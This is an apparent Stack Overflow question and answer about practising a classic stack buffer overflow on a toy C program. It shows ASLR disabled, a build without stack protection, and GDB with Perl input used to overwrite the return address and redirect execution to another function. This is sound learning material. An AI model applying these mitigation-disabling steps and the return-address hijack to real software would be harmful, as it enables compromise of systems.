Search code examples
cgccstack-overflow

How do I test out buffer overflows on a modern system?

I'm currently interested in learning how to do buffer overflows. I've done quite a bit of assembly, and understand how the stack works and how to implement a buffer overflow in C. However, I'm running across quite a bit of trouble trying to get GCC 4.9.1 to allow me to overflow a buffer properly. I'm running Debian Jessie.

Here is the tutorial that I'm attempting to follow, in section 2.2. I've copy/pasted the C program he provides, and I'm using the same Perl script that he is, so everything is the exact same as his case (except the system, of course).

These are the results that I'm getting consistently:

 ~/projects/buffer-overflow$ ls
 run.pl  test.c
 ~/projects/buffer-overflow$ sudo su 
 root@wash# echo "0" > /proc/sys/kernel/randomize_va_space 
 root@wash# exit
 exit
 ~/projects/buffer-overflow$ gcc -m32 -fno-stack-protector -zexecstack test.c 
 ~/projects/buffer-overflow$ ./run.pl 
 Address of foo = 0x804845b
 Address of bar = 0x80484a4
 My stack looks like:
 (nil)
 0xffffd4a8
 0xf7e58b2f
 0xf7fb3ac0
 0x8048657
 0xffffd494

 ABCDEFGHIJKLMNOPP@
 Now the stack looks like:
 0xffffd718
 0xffffd4a8
 0xf7e58b2f
 0xf7fb3ac0
 0x42418657
 0x46454443
Solution

  • That Perl script isn't particularly useful here, different systems will use different addresses, so let's do it without the script...

    First of all, find out the exact number of bytes needed to overwrite the return address. We can do this with GDB and Perl:

    (gdb) run `perl -e 'print "A" x 26';`
Address of foo = 0x804845b
Address of bar = 0x80484a5
My stack looks like:
0xf7fb1000
0xffffdab8
0xf7e44476
0xf7fb1d60
0x8048647
 0xffffdaa8

AAAAAAAAAAAAAAAAAAAAAAAAAA
Now the stack looks like:
0xffffdcbb
0xffffdab8
0xf7e44476
0xf7fb1d60
0x41418647
0x41414141


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

    As you can see, 26 bytes will overwrite the EIP, so by replacing the last four "A" characters with our bar() function address (don't forget to put it in little endian format), we should have success:

    (gdb) run `perl -e 'print "A" x 22';``perl -e 'print "\xa5\x84\x04\x8"';`
Address of foo = 0x804845b
Address of bar = 0x80484a5
My stack looks like:
0xf7fb1000
0xffffdab8
0xf7e44476
0xf7fb1d60
0x8048647
 0xffffdaa8

AAAAAAAAAAAAAAAAAAAAAA��
Now the stack looks like:
0xffffdcbb
0xffffdab8
0xf7e44476
0xf7fb1d60
0x41418647
0x41414141

Augh! I've been hacked!

Program received signal SIGSEGV, Segmentation fault.
0xffffdc06 in ?? ()

    As you can see, we successfully returned to function bar().